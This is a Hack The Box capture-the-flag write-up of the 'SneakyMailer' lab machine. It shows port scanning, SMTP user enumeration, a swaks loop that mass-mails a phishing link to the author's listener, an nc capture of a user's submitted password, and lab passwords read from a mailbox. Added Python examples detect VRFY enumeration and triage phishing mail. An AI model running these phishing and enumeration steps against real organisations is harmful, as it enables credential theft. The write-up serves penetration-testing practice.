
Hack the Box - SneakyMailer Writeup

HTB - SneakyMailer

Overview

Descriptive information card on the machine sneakymailer

This machine is on TJ_Null’s list of OSCP-like machines. Have fun!

Useful Skills and Tools

Save a transcript of any session (even remote nc sessions!)

  • With the command script $log_filename you can save the output of any session, including stderr and output from programs such as nano and vim! This is invaluable when you exit a session and have forgotten to copy or back up something you did. To stop the transcript, type exit after exiting any shells you may have spawned during that session.

Enumeration

Nmap scan

I started my enumeration with an nmap scan of 10.10.10.197. The options I regularly use are:

Flag        Purpose
-p-         A shortcut which tells nmap to scan all ports
-vvv        Gives very verbose output so I can see the results as they are found, and also includes some information not normally shown
-sC         Equivalent to --script=default and runs a collection of nmap enumeration scripts against the target
-sV         Does a service version scan
-oA $name   Saves all three formats (standard, greppable, and XML) of output with a filename of $name

┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ nmap -n -v -sCV -p- -oA sneakymailer 10.10.10.197
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-08 16:59 EST
Nmap scan report for 10.10.10.197

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
80/tcp   open  http     nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: IMAP4rev1 STARTTLS OK IDLE THREAD=ORDEREDSUBJECT SORT ACL QUOTA UIDPLUS UTF8=ACCEPTA0001 NAMESPACE completed THREAD=REFERENCES CHILDREN CAPABILITY ENABLE ACL2=UNION
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after:  2021-05-14T17:14:21
| MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: IMAP4rev1 OK IDLE THREAD=ORDEREDSUBJECT SORT ACL QUOTA UIDPLUS UTF8=ACCEPTA0001 NAMESPACE completed AUTH=PLAIN THREAD=REFERENCES CHILDREN CAPABILITY ENABLE ACL2=UNION
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after:  2021-05-14T17:14:21
| MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 81.28 seconds

Ports 21, 22, 25, 80, 143, 993, and 8080 were open.

Port 21 - FTP

┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:zweilos): anonymous
530 Permission denied.
Login failed.
ftp> exit
221 Goodbye.

First I tried anonymous login through FTP, but was denied access.

Port 80 - HTTP

Port 80 redirected to http://sneakycorp.htb/, so I added the domain to /etc/hosts.

After adding the domain name to /etc/hosts

I found the names Cara Stevens & Bradley Greer from the messages pop-up. Possible usernames can be extracted from these names using common business username patterns.

I also checked the page source code to see if there was anything interesting in the messages that couldn’t be seen in the previews, and found that Bradley Greer was my ‘personal tester’ and Cara Stevens was the owner of the company. Both seemed like good targets.

On the /team.php page there was a listing of company employees.

Name    Position    Office    Email
Airi Satou     Accountant     Tokyo     airisatou@sneakymailer.htb
Angelica Ramos     Chief Executive Officer (CEO)     London     angelicaramos@sneakymailer.htb
Ashton Cox     Junior Technical Author     San Francisco     ashtoncox@sneakymailer.htb
Bradley Greer     Tester     London     bradleygreer@sneakymailer.htb
Brenden Wagner     Software Engineer     San Francisco     brendenwagner@sneakymailer.htb
Brielle Williamson     Tester     New York     briellewilliamson@sneakymailer.htb
Bruno Nash     Software Engineer     London     brunonash@sneakymailer.htb
Caesar Vance     Tester     New York     caesarvance@sneakymailer.htb
Cara Stevens     Sales Assistant     New York     carastevens@sneakymailer.htb
Cedric Kelly     Senior Javascript Developer     Edinburgh     cedrickelly@sneakymailer.htb
Charde Marshall     Tester     San Francisco     chardemarshall@sneakymailer.htb
Colleen Hurst     Javascript Developer     San Francisco     colleenhurst@sneakymailer.htb
Dai Rios     Personnel Lead     Edinburgh     dairios@sneakymailer.htb
Donna Snider     Customer Support     New York     donnasnider@sneakymailer.htb
Doris Wilder     Sales Assistant     Sidney     doriswilder@sneakymailer.htb
Finn Camacho     Support Engineer     San Francisco     finncamacho@sneakymailer.htb
Fiona Green     Tester     San Francisco     fionagreen@sneakymailer.htb
Garrett Winters     Accountant     Tokyo     garrettwinters@sneakymailer.htb
Gavin Cortez     Team Leader     San Francisco     gavincortez@sneakymailer.htb
Gavin Joyce     Developer     Edinburgh     gavinjoyce@sneakymailer.htb
Gloria Little     Systems Administrator     New York     glorialittle@sneakymailer.htb
Haley Kennedy     Tester     London     haleykennedy@sneakymailer.htb
Hermione Butler     Regional Director     London     hermionebutler@sneakymailer.htb
Herrod Chandler     Tester     San Francisco     herrodchandler@sneakymailer.htb
Hope Fuentes     Secretary     San Francisco     hopefuentes@sneakymailer.htb
Howard Hatfield     Office Manager     San Francisco     howardhatfield@sneakymailer.htb
Jackson Bradshaw     Director     New York     jacksonbradshaw@sneakymailer.htb
Jena Gaines     Office Manager     London     jenagaines@sneakymailer.htb
Jenette Caldwell     Development Lead     New York     jenettecaldwell@sneakymailer.htb
Jennifer Acosta     Junior Javascript Developer     Edinburgh     jenniferacosta@sneakymailer.htb
Jennifer Chang     Regional Director     Singapore     jenniferchang@sneakymailer.htb
Jonas Alexander     Developer     San Francisco     jonasalexander@sneakymailer.htb
Lael Greer     Systems Administrator     London     laelgreer@sneakymailer.htb
Martena Mccray     Post-Sales support     Edinburgh     martenamccray@sneakymailer.htb
Michael Silva     Marketing Designer     London     michaelsilva@sneakymailer.htb
Michelle House     Integration Specialist     Sidney     michellehouse@sneakymailer.htb
Olivia Liang     Support Engineer     Singapore     olivialiang@sneakymailer.htb
Paul Byrd     Tester     New York     paulbyrd@sneakymailer.htb
Prescott Bartlett     Technical Author     London     prescottbartlett@sneakymailer.htb
Quinn Flynn     Support Lead     Edinburgh     quinnflynn@sneakymailer.htb
Rhona Davidson     Integration Specialist     Tokyo     rhonadavidson@sneakymailer.htb
Sakura Yamamoto     Support Engineer     Tokyo     sakurayamamoto@sneakymailer.htb
Serge Baldwin     Data Coordinator     Singapore     sergebaldwin@sneakymailer.htb
Shad Decker     Regional Director     Edinburgh     shaddecker@sneakymailer.htb
Shou Itou     Regional Marketing     Tokyo     shouitou@sneakymailer.htb
Sonya Frost     Tester     Edinburgh     sonyafrost@sneakymailer.htb
Suki Burks     Developer     London     sukiburks@sneakymailer.htb
sulcud     The new guy     Freelance     sulcud@sneakymailer.htb
Tatyana Fitzpatrick     Regional Director     London     tatyanafitzpatrick@sneakymailer.htb
Thor Walton     Developer     New York     thorwalton@sneakymailer.htb
Tiger Nixon     System Architect     Edinburgh     tigernixon@sneakymailer.htb
Timothy Mooney     Office Manager     London     timothymooney@sneakymailer.htb
Unity Butler     Marketing Designer     San Francisco     unitybutler@sneakymailer.htb
Vivian Harrell     Financial Controller     San Francisco     vivianharrell@sneakymailer.htb
Yuri Berry     Chief Marketing Officer (CMO)     New York     yuriberry@sneakymailer.htb
Zenaida Frank     Software Engineer     New York     zenaidafrank@sneakymailer.htb
Zorita Serrano     Software Engineer     San Francisco     zoritaserrano@sneakymailer.htb

There was a huge list of employees at the company. I added the usernames and emails to lists for later use.

I found out afterwards that there is a nice tool that can extract emails from a page: https://email-checker.net/extract

In the source code of the page I also found a reference to a register page at /pypi/register.php.

Dirbuster also found this page shortly afterwards, though there wasn’t much else to look through.

I navigated to this register page and tried to create an account, however it did not seem to be functional.

Typing in pypi.sneakycorp.htb redirected to the main page, so I loaded ffuf to see if I could find any other virtual hosts.

┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://FUZZ.sneakycorp.htb/ -c                     

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.0.2
________________________________________________

 :: Method           : GET
 :: URL              : http://FUZZ.sneakycorp.htb/
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

dev                     [Status: 200, Size: 13737, Words: 4007, Lines: 341]

On dev.sneakycorp.htb I found a site that was almost identical to the main page, though the register page was visible in a link here.

I tried to register again.

Port 8080 - HTTP

I decided to check out port 8080 on each of the virtual hosts. dev did not lead anywhere, but pypi did: http://pypi.sneakycorp.htb:8080/

I found pypiserver version 1.3.2 running there; the newest is 1.4.2.

https://blog.pentesteracademy.com/learn-to-interact-with-pypi-server-in-3-minutes-71d45fa46273

Port 25 - SMTP

Verifying valid email addresses

┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ telnet sneakycorp.htb 25                                                                        1 ⨯
Trying 10.10.10.197...
Connected to sneakycorp.htb.
Escape character is '^]'.
HELO
220 debian ESMTP Postfix (Debian/GNU)
501 Syntax: HELO hostname
HELO sneakycorp.htb
250 debian
MAIL FROM:zweilos@sneakycorp.htb
250 2.1.0 Ok
RCPT TO:bradleygreer@sneakymailer.htb
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
This is a test!    


.
250 2.0.0 Ok: queued as 155A82467F
VRFY root
252 2.0.0 root
vrfy test
550 5.1.1 <test>: Recipient address rejected: User unknown in local recipient table
VRFY bradleygreer@sneakymailer.htb
252 2.0.0 bradleygreer@sneakymailer.htb
VRFY carastevens@sneakymailer.htb
252 2.0.0 carastevens@sneakymailer.htb
VRFY airisatou@sneakymailer.htb
252 2.0.0 airisatou@sneakymailer.htb
QUIT
221 2.0.0 Bye
Connection closed by foreign host.

References: https://www.interserver.net/tips/kb/check-email-address-really-exists-without-sending-email/ and https://www.mailenable.com/kb/content/article.asp?ID=ME020207

I sent an email to my personal tester greer-san… and tested a few addresses; all seemed valid.

msf5 exploit(multi/handler) > use smtp_enum

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/smtp/smtp_enum                   normal  No     SMTP User Enumeration Utility


[*] Using auxiliary/scanner/smtp/smtp_enum
msf5 auxiliary(scanner/smtp/smtp_enum) > options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   RHOSTS     10.10.10.193                                                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      25                                                             yes       The target port (TCP)
   THREADS    1                                                              yes       The number of concurrent threads (max one per host)
   UNIXONLY   true                                                           yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf5 auxiliary(scanner/smtp/smtp_enum) > set rhosts 10.10.10.197
rhosts => 10.10.10.197
msf5 auxiliary(scanner/smtp/smtp_enum) > run


[*] 10.10.10.197:25       - 10.10.10.197:25 Banner: 220 debian ESMTP Postfix (Debian/GNU)
[+] 10.10.10.197:25       - 10.10.10.197:25 Users found: , _apt, avahi-autoipd, backup, bin, daemon, ftp, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, postfix, postmaster, proxy, sshd, sync, sys, systemd-coredump, systemd-network, systemd-resolve, systemd-timesync, uucp, www-data
[*] 10.10.10.197:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE users
USER_FILE => users
msf5 auxiliary(scanner/smtp/smtp_enum) > run

[*] 10.10.10.197:25       - 10.10.10.197:25 Banner: 220 debian ESMTP Postfix (Debian/GNU)
[+] 10.10.10.197:25       - 10.10.10.197:25 Users found: airisatou@sneakymailer.htb, angelicaramos@sneakymailer.htb, ashtoncox@sneakymailer.htb, bradleygreer@sneakymailer.htb, brendenwagner@sneakymailer.htb, briellewilliamson@sneakymailer.htb, brunonash@sneakymailer.htb, caesarvance@sneakymailer.htb, carastevens@sneakymailer.htb, cedrickelly@sneakymailer.htb, chardemarshall@sneakymailer.htb, colleenhurst@sneakymailer.htb, dairios@sneakymailer.htb, donnasnider@sneakymailer.htb, doriswilder@sneakymailer.htb, finncamacho@sneakymailer.htb, fionagreen@sneakymailer.htb, garrettwinters@sneakymailer.htb, gavincortez@sneakymailer.htb, gavinjoyce@sneakymailer.htb, glorialittle@sneakymailer.htb, haleykennedy@sneakymailer.htb, hermionebutler@sneakymailer.htb, herrodchandler@sneakymailer.htb, hopefuentes@sneakymailer.htb, howardhatfield@sneakymailer.htb, jacksonbradshaw@sneakymailer.htb, jenagaines@sneakymailer.htb, jenettecaldwell@sneakymailer.htb, jenniferacosta@sneakymailer.htb, jenniferchang@sneakymailer.htb, jonasalexander@sneakymailer.htb, laelgreer@sneakymailer.htb, martenamccray@sneakymailer.htb, michaelsilva@sneakymailer.htb, michellehouse@sneakymailer.htb, olivialiang@sneakymailer.htb, paulbyrd@sneakymailer.htb, prescottbartlett@sneakymailer.htb, quinnflynn@sneakymailer.htb, rhonadavidson@sneakymailer.htb, sakurayamamoto@sneakymailer.htb, sergebaldwin@sneakymailer.htb, shaddecker@sneakymailer.htb, shouitou@sneakymailer.htb, sonyafrost@sneakymailer.htb, sukiburks@sneakymailer.htb, sulcud@sneakymailer.htb, tatyanafitzpatrick@sneakymailer.htb, thorwalton@sneakymailer.htb, tigernixon@sneakymailer.htb, timothymooney@sneakymailer.htb, unitybutler@sneakymailer.htb, vivianharrell@sneakymailer.htb, yuriberry@sneakymailer.htb, zenaidafrank@sneakymailer.htb, zoritaserrano@sneakymailer.htb
[*] 10.10.10.197:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The module verified all of the usernames.
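
Strictly, a 252 reply means "cannot verify, but will accept", yet next to the 550 returned for unknown names it still separates real mailboxes from invalid ones. The following is an added example, not code from the original writeup: it classifies the VRFY replies from the telnet session and flags clients that issue many VRFY commands. The log lines are constructed and assume the per-session command summary Postfix 3.x writes on disconnect; the function names, threshold and client addresses are illustrative.

```python
import re
from collections import defaultdict

# Constructed from the telnet session above: VRFY commands and their replies.
TRANSCRIPT = """\
VRFY root
252 2.0.0 root
vrfy test
550 5.1.1 <test>: Recipient address rejected: User unknown in local recipient table
VRFY bradleygreer@sneakymailer.htb
252 2.0.0 bradleygreer@sneakymailer.htb
"""

# Constructed sample log lines (assumed format: Postfix 3.x disconnect summary).
# 198.51.100.7 and 192.0.2.25 are documentation addresses, not hosts from the page.
SAMPLE_LOG = [
    "Nov  8 21:01:12 debian postfix/smtpd[1432]: disconnect from unknown[198.51.100.7] "
    "helo=1 mail=1 rcpt=1 data=1 vrfy=4/5 quit=1 commands=9/10",
    "Nov  8 21:05:40 debian postfix/smtpd[1440]: disconnect from unknown[198.51.100.7] "
    "ehlo=1 vrfy=57 quit=1 commands=59",
    "Nov  8 21:07:02 debian postfix/smtpd[1451]: disconnect from mail.example.org[192.0.2.25] "
    "ehlo=1 mail=1 rcpt=1 data=1 quit=1 commands=5",
]

DISCONNECT = re.compile(r"postfix/smtpd\[\d+\]: disconnect from \S+\[([0-9a-fA-F.:]+)\](.*)")


def classify_vrfy(transcript):
    """Map each VRFY argument to 'accepted', 'rejected' or 'other' by reply code."""
    results = {}
    pending = None
    for line in transcript.splitlines():
        line = line.strip()
        command = re.match(r"(?i)vrfy\s+(\S+)", line)
        if command:
            pending = command.group(1)
            continue
        reply = re.match(r"(\d{3})([ -])", line)
        if not (pending and reply):
            continue
        if reply.group(2) == "-":
            continue  # continuation line of a multi-line reply; wait for the last one
        code = int(reply.group(1))
        if code in (250, 251, 252):
            results[pending] = "accepted"
        elif code >= 500:
            results[pending] = "rejected"
        else:
            results[pending] = "other"
        pending = None
    return results


def leaks_recipients(results):
    """True when known and unknown names get distinguishable answers."""
    return {"accepted", "rejected"} <= set(results.values())


def vrfy_counts(log_lines):
    """Total VRFY commands per client IP, taken from disconnect summaries."""
    counts = defaultdict(int)
    for line in log_lines:
        match = DISCONNECT.search(line)
        if not match:
            continue
        for token in match.group(2).split():
            name, _, value = token.partition("=")
            if name == "vrfy":
                # "vrfy=4/5" is successes/total; "vrfy=57" means all succeeded.
                counts[match.group(1)] += int(value.split("/")[-1])
    return dict(counts)


def flag_enumerators(log_lines, threshold=10):
    """Client IPs whose VRFY total reaches the (illustrative) threshold."""
    return sorted(ip for ip, n in vrfy_counts(log_lines).items() if n >= threshold)


if __name__ == "__main__":
    verdicts = classify_vrfy(TRANSCRIPT)
    print(verdicts, "oracle:", leaks_recipients(verdicts))
    print("flagged:", flag_enumerators(SAMPLE_LOG))
```

Postfix turns the command off with `disable_vrfy_command = yes` in main.cf.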

Sending a phishing email with SMTP

I searched for how to interact with SMTP through the command line and found swaks: https://github.com/jetmore/swaks

┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ for address in $(cat users); do swaks --helo sneakycorp.htb \
--to $address --from zweilos@sneakymailer.htb --header "Subject: Check this out" \
--body "Check this out! http://10.10.15.100:8090/" --server 10.10.10.197; done
  
=== Trying 10.10.10.197:25...
=== Connected to 10.10.10.197.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO sneakycorp.htb
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<zweilos@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<airisatou@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Sun, 08 Nov 2020 21:03:55 -0500
 -> To: airisatou@sneakymailer.htb
 -> From: zweilos@sneakymailer.htb
 -> Subject: Check this out
 -> Message-Id: <20201108210355.081776@kali.kali>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out! http://10.10.15.100:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0 Ok: queued as B850724954
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.
=== Trying 10.10.10.197:25...
=== Connected to 10.10.10.197.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO sneakycorp.htb
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<zweilos@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<angelicaramos@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Sun, 08 Nov 2020 21:04:05 -0500
 -> To: angelicaramos@sneakymailer.htb
 -> From: zweilos@sneakymailer.htb
 -> Subject: Check this out
 -> Message-Id: <20201108210405.081780@kali.kali>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out! http://10.10.15.100:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0 Ok: queued as 3A9A124956
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

There was no reply, so I decided to try sending from a working local address. I also put the “link” on a new line in case whatever script was processing it can't parse it for some reason (maybe the !?).

┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ for address in $(cat users); do swaks --helo sneakycorp.htb \
--to $address --from root@sneakymailer.htb --header "Subject: Check this out" \
--body "Check this out. \nhttp://10.10.15.100:8090/" --server 10.10.10.197; done 

=== Trying 10.10.10.197:25...
=== Connected to 10.10.10.197.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO sneakycorp.htb
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<root@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<airisatou@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Sun, 08 Nov 2020 21:22:30 -0500
 -> To: airisatou@sneakymailer.htb
 -> From: root@sneakymailer.htb
 -> Subject: Check this out
 -> Message-Id: <20201108212230.082099@kali.kali>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out! 
 -> http://10.10.15.100:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0 Ok: queued as 5A9CF249C9
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

...snipped...

=== Trying 10.10.10.197:25...
=== Connected to 10.10.10.197.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO sneakycorp.htb
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<root@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<zenaidafrank@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Wed, 11 Nov 2020 11:19:46 -0500
 -> To: zenaidafrank@sneakymailer.htb
 -> From: root@sneakymailer.htb
 -> Subject: Check this out
 -> Message-Id: <20201111111946.150282@kali.kali>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out 
 -> http://10.10.14.174:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0 Ok: queued as C831324848
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.
=== Trying 10.10.10.197:25...
=== Connected to 10.10.10.197.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO sneakycorp.htb
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<root@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<zoritaserrano@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Wed, 11 Nov 2020 11:19:57 -0500
 -> To: zoritaserrano@sneakymailer.htb
 -> From: root@sneakymailer.htb
 -> Subject: Check this out
 -> Message-Id: <20201111111957.150283@kali.kali>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out 
 -> http://10.10.14.174:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0 Ok: queued as 408FC2484A
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

I decided to try resetting the box since I was getting no replies to the phishing email, and also removed the ! from the body to see if that was causing issues.
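
Seen from the receiving side, the message in the swaks transcripts above carries several signals a mail filter can score. The following is an added example, not code from the original writeup: it parses the message as sent and reports those signals. The rule names, the `triage` helper and the benign sample are assumptions made for illustration.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlsplit

# Constructed from the second swaks transcript above (headers and body as sent).
PHISH = """\
Date: Sun, 08 Nov 2020 21:22:30 -0500
To: airisatou@sneakymailer.htb
From: root@sneakymailer.htb
Subject: Check this out
Message-Id: <20201108212230.082099@kali.kali>
X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/

Check this out!
http://10.10.15.100:8090/
"""

# Constructed benign message for contrast; its host names are hypothetical.
BENIGN = """\
Date: Sun, 08 Nov 2020 09:00:00 -0500
To: airisatou@sneakymailer.htb
From: hr@sneakymailer.htb
Subject: Updated leave policy
Message-Id: <20201108090000.1@mail.sneakymailer.htb>

The policy is at https://intranet.sneakymailer.htb/policy
"""

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def url_findings(body):
    """Flag links that point at a bare IP address or a non-standard port."""
    findings = []
    for url in URL_RE.findall(body):
        parts = urlsplit(url)
        try:
            ipaddress.ip_address(parts.hostname or "")
            findings.append("link-to-ip-literal")
        except ValueError:
            pass  # host is a name, not an IP literal
        try:
            port = parts.port
        except ValueError:
            port = None  # malformed port; ignored by this check
        if port not in (None, 80, 443):
            findings.append("link-to-nonstandard-port")
    return findings


def domain_of(value):
    """Domain part of an address or Message-Id, lower-cased ('' if empty)."""
    return value.strip().strip("<>").rpartition("@")[2].lower()


def header_findings(msg, local_domain):
    """Flag header inconsistencies for mail claiming to come from local_domain."""
    findings = []
    from_domain = domain_of(parseaddr(msg.get("From", ""))[1])
    mid_domain = domain_of(msg.get("Message-Id", ""))
    internal = mid_domain == local_domain or mid_domain.endswith("." + local_domain)
    # An internal sender whose Message-Id was minted by a foreign host.
    if from_domain == local_domain and mid_domain and not internal:
        findings.append("internal-sender-external-message-id")
    # swaks announces itself in X-Mailer unless the sender overrides it.
    if "swaks" in msg.get("X-Mailer", "").lower():
        findings.append("test-tool-x-mailer")
    return findings


def triage(raw, local_domain):
    """Return the list of findings for one raw RFC 5322 message."""
    msg = message_from_string(raw)
    return header_findings(msg, local_domain) + url_findings(msg.get_payload())


if __name__ == "__main__":
    print("phish :", triage(PHISH, "sneakymailer.htb"))
    print("benign:", triage(BENIGN, "sneakymailer.htb"))
```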

I was doing a packet capture the whole time, trying to see if my messages were being sent/received, and finally got a reply back from one.

┌──(zweilos㉿kali)-[~/htb/sneakymailer]
└─$ nc -lvnp 8090                                                                                  1 ⨯
listening on [any] 8090 ...
connect to [10.10.14.174] from (UNKNOWN) [10.10.10.197] 51434
POST / HTTP/1.1
Host: 10.10.14.174:8090
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

Got a click! The user Paul Byrd clicked on my link and gave me a (URL-encoded) password.

firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

This decoded to give me a (super-complicated) password of:

^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

Reading Paul’s mail

Since Paul was nice enough to send me his email password, I decided to log into his mailbox to see what kind of information I could find.

I put in the account information for Paul into my email client and pointed the server towards the target.

After logging into the mailbox I noticed there wasn’t anything in the inbox (probably emptied regularly to keep other players from accidentally clicking on each other’s phishing email links). There were two messages in the Sent items folder, however. The first was an email to the administrator root@debian asking them to change the password for the developer account. He was nice enough to send the old password m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C as well. I made sure to take note of this in case it was used anywhere, or in case the admin hadn’t changed it yet.

The second email was addressed to low, which I thought was another potential username on the machine. The message laid out a task to “install, test, and then erase” all of the modules in the PyPI service. I hoped that perhaps Paul had created a script to automate this action, and that I could possibly get it to execute a module I somehow got installed to the service.

Hello administrator, I want to change this password for the developer account

Username: developer
